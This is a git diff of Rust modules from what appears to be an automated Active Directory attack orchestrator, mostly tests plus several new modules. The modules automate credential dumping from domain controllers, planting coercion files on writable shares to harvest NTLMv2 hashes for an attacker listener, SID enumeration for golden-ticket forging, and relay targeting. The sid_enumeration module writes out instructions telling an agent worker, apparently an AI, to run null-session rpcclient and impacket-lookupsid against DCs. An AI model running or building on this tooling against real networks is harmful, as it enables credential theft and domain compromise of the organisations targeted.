state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Public"); + assert_eq!(work[0].dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "READ")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state.mark_processed( + DEDUP_SEARCHCONNECTOR, + "searchconn:192.168.58.22:Public".into(), + ); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_domain_matched_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_no_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + // No host entry for this share IP, so domain is empty -> falls back to first cred + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_shares_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let names: Vec<&str> = work.iter().map(|w| w.share_name.as_str()).collect(); + assert!(names.contains(&"Public")); + assert!(names.contains(&"Data")); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs index 005da2b5..27d84f9c 100644 --- a/ares-cli/src/orchestrator/automation/secretsdump.rs +++ b/ares-cli/src/orchestrator/automation/secretsdump.rs @@ -84,7 +84,7 @@ pub async fn auto_local_admin_secretsdump( let mut items = Vec::new(); for cred in &creds { - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_valid_secretsdump_target(dc_domain, &cred.domain) { let dedup = secretsdump_dedup_key(dc_ip, &cred.domain, &cred.username); if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { @@ -135,7 +135,7 @@ pub async fn auto_local_admin_secretsdump( for dominated in &state.dominated_domains { let dom = dominated.to_lowercase(); // Find parent domain DCs: domains where the child ends with ".{parent}" - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_child_of(&dom, dc_domain) { // Find Administrator NTLM hash from the dominated child domain if let Some(hash) = state.hashes.iter().find(|h| { diff --git a/ares-cli/src/orchestrator/automation/shadow_credentials.rs b/ares-cli/src/orchestrator/automation/shadow_credentials.rs index 4d8759ec..f1ba4861 100644 --- a/ares-cli/src/orchestrator/automation/shadow_credentials.rs +++ b/ares-cli/src/orchestrator/automation/shadow_credentials.rs @@ -82,29 +82,14 @@ pub async fn auto_shadow_credentials( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - - // Also check for NTLM hash as fallback + // Find credential for the source user. The source user's + // own domain may differ from the vuln's target `domain` + // (cross-forest ACL edges like charlie@contoso → + // ivy@fabrikam), so we cannot domain-restrict the + // lookup against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; diff --git a/ares-cli/src/orchestrator/automation/share_coercion.rs b/ares-cli/src/orchestrator/automation/share_coercion.rs new file mode 100644 index 00000000..be68f281 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/share_coercion.rs @@ -0,0 +1,515 @@ +//! auto_share_coercion -- drop coercion files (.scf, .url, .lnk) on writable +//! shares to capture NTLMv2 hashes via Responder/ntlmrelayx. +//! +//! When a user browses to a share containing one of these files, Windows +//! automatically connects back to the attacker-controlled listener, leaking the +//! user's NTLMv2 hash. This is a passive credential harvesting technique. +//! +//! Requires: writable shares discovered by share_enum, a listener IP for the +//! UNC path in the coercion file, and Responder running on the listener. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect share coercion work items from current state. +/// +/// Pure logic extracted from `auto_share_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. Returns at most 3 items +/// per call to avoid flooding the dispatcher. +fn collect_share_coercion_work(state: &StateInner, listener: &str) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => return Vec::new(), + }; + + state + .shares + .iter() + .filter(|s| { + let perms = s.permissions.to_uppercase(); + perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE") + }) + .filter(|s| { + // Skip default admin/system shares + let name_upper = s.name.to_uppercase(); + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ) + }) + .filter(|s| { + let dedup_key = format!("{}:{}", s.host, s.name); + !state.is_processed(DEDUP_WRITABLE_SHARES, &dedup_key) + }) + .map(|s| ShareCoercionWork { + host: s.host.clone(), + share_name: s.name.clone(), + listener: listener.to_string(), + credential: cred.clone(), + }) + .take(3) // limit per cycle to avoid flooding + .collect() +} + +/// Monitors for writable shares and dispatches coercion file drops. +/// Interval: 45s. +pub async fn auto_share_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("share_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for UNC path in coercion files + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_share_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "share_coercion", + "target_ip": item.host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("share_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host, + share = %item.share_name, + "Share coercion file drop dispatched" + ); + + let dedup_key = format!("{}:{}", item.host, item.share_name); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WRITABLE_SHARES, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WRITABLE_SHARES, &dedup_key) + .await; + } + Ok(None) => { + debug!( + host = %item.host, + share = %item.share_name, + "Share coercion task deferred by throttler" + ); + } + Err(e) => { + warn!( + err = %e, + host = %item.host, + share = %item.share_name, + "Failed to dispatch share coercion" + ); + } + } + } + } +} + +struct ShareCoercionWork { + host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + #[test] + fn dedup_key_format() { + let key = format!("{}:{}", "192.168.58.22", "Users"); + assert_eq!(key, "192.168.58.22:Users"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WRITABLE_SHARES, "writable_shares"); + } + + #[test] + fn admin_shares_filtered() { + let admin_shares = ["C$", "ADMIN$", "IPC$", "PRINT$", "SYSVOL", "NETLOGON"]; + for name in &admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered" + ); + } + } + + #[test] + fn non_admin_shares_pass() { + let user_shares = ["Users", "Public", "Data", "shared"]; + for name in &user_shares { + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should pass through" + ); + } + } + + #[test] + fn writable_permission_matching() { + let writable = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &writable { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(is_writable, "{p} should be writable"); + } + } + + #[test] + fn readonly_permission_rejected() { + let readonly = ["READ", "NONE", "DENIED"]; + for p in &readonly { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "{p} should NOT be writable"); + } + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "share_coercion", + "target_ip": "192.168.58.22", + "share_name": "Users", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "share_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Users"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn admin_share_filtering_lowercase_variations() { + let lower_admin_shares = ["c$", "admin$", "ipc$", "print$", "sysvol", "netlogon"]; + for name in &lower_admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} (lowercase) should be filtered after uppercasing" + ); + } + } + + #[test] + fn writable_permission_with_change_keyword() { + let perm = "CHANGE"; + let perms = perm.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "CHANGE alone should not match WRITE logic"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = ShareCoercionWork { + host: "192.168.58.22".into(), + share_name: "Data".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.host, "192.168.58.22"); + assert_eq!(work.share_name, "Data"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn per_cycle_limit_of_three() { + let shares: Vec = (0..10).map(|i| format!("Share{i}")).collect(); + let limited: Vec<&String> = shares.iter().take(3).collect(); + assert_eq!(limited.len(), 3); + assert_eq!(*limited[0], "Share0"); + assert_eq!(*limited[2], "Share2"); + } + + #[test] + fn empty_share_name_handling() { + let name = ""; + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "Empty share name should pass admin filter" + ); + } + + #[test] + fn case_insensitive_admin_share_check() { + let mixed_case = ["Sysvol", "NetLogon", "Admin$", "Ipc$"]; + for name in &mixed_case { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered regardless of case" + ); + } + } + + // --- collect_share_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Users"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "READ")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_admin_shares_filtered() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "ADMIN$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "C$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "IPC$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "SYSVOL", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "NETLOGON", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + state.mark_processed(DEDUP_WRITABLE_SHARES, "192.168.58.22:Users".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_limits_to_three_per_cycle() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + for i in 0..5 { + state + .shares + .push(make_share("192.168.58.22", &format!("Share{i}"), "WRITE")); + } + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 3); + } + + #[test] + fn collect_read_write_permission_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_name, "Data"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/sid_enumeration.rs b/ares-cli/src/orchestrator/automation/sid_enumeration.rs new file mode 100644 index 00000000..4cd11565 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/sid_enumeration.rs @@ -0,0 +1,426 @@ +//! auto_sid_enumeration -- enumerate domain SIDs and well-known SID mappings. +//! +//! Queries each discovered DC via LDAP to resolve the domain SID, then maps +//! well-known RIDs (500=Administrator, 502=krbtgt, 512=Domain Admins, etc.) +//! to confirm account names. This is useful when the RID-500 account has +//! been renamed (e.g., not "Administrator"). +//! +//! Also discovers the domain SID needed for golden ticket forging and +//! ExtraSid attacks. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SID enumeration work items from current state. +/// +/// Pure logic extracted from `auto_sid_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_sid_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip if we already have the SID for this domain + if state.domain_sids.contains_key(domain) { + continue; + } + + let dedup_key = format!("sid_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_SID_ENUMERATION, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(SidEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Enumerate domain SIDs and well-known accounts. +/// Interval: 45s. +pub async fn auto_sid_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("sid_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_sid_enum_work(&state) + }; + + for item in work { + // Cross-forest authenticated RPC/LDAP from the source forest's + // credential typically returns ACCESS_DENIED — but `rpcclient + // -U "" -N -c lsaquery` over a null session usually succeeds + // against DCs that allow anonymous LSA queries (most legacy + // configurations). The agent loop won't try the null-session + // path on its own when handed a credential, so we explicitly + // instruct it to fall through. The result-processor's + // `extract_lsaquery_domain_sid` regex captures the resulting + // `Domain Name: / Domain Sid:` block and caches it against the + // domain, which unblocks `forge_inter_realm_and_dump`. + let cred_is_cross_forest = !item + .credential + .domain + .to_lowercase() + .ends_with(&item.domain.to_lowercase()) + && !item + .domain + .to_lowercase() + .ends_with(&item.credential.domain.to_lowercase()) + && item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let instructions = if cred_is_cross_forest { + Some(format!( + "Resolve the domain SID and RID-500 account name for {dom} ({dc}). \ + The provided credential is from a different forest and authenticated \ + RPC/LDAP from outside this forest typically fails with ACCESS_DENIED. \ + Run `rpcclient -U \"\" -N {dc} -c \"lsaquery\"` first (null/anonymous \ + session — no credential needed) to capture the `Domain Name:` and \ + `Domain Sid:` lines. Then run `impacket-lookupsid` with the provided \ + credential as a secondary attempt for RID-500 mapping. Report both \ + outputs verbatim via task_complete tool_outputs so the parser can \ + extract the SID.", + dom = item.domain, + dc = item.dc_ip, + )) + } else { + None + }; + + let mut payload = json!({ + "technique": "sid_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + if let Some(text) = instructions { + payload["instructions"] = json!(text); + } + + let priority = dispatcher.effective_priority("sid_enumeration"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "SID enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SID_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SID_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "SID enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch SID enumeration"); + } + } + } + } +} + +struct SidEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("sid_enum:{}", "contoso.local"); + assert_eq!(key, "sid_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SID_ENUMERATION, "sid_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "sid_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "sid_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = SidEnumWork { + dedup_key: "sid_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("sid_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "sid_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("sid_enum:{}", "contoso.local"); + let key2 = format!("sid_enum:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_domain_with_known_sid() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1234".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SID_ENUMERATION, "sid_enum:contoso.local".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "sid_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/smb_signing.rs b/ares-cli/src/orchestrator/automation/smb_signing.rs new file mode 100644 index 00000000..909f41f0 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/smb_signing.rs @@ -0,0 +1,279 @@ +//! auto_smb_signing_detection -- bridge recon host data to VulnerabilityInfo. +//! +//! The SMB banner parser (`hosts.rs`) detects `(signing:True)` to mark DCs but +//! does NOT create VulnerabilityInfo objects for hosts with signing disabled. +//! This module scans `state.hosts` for non-DC hosts (signing:False is the default +//! for member servers) and publishes `smb_signing_disabled` vulns, which the +//! `ntlm_relay` module consumes to dispatch relay 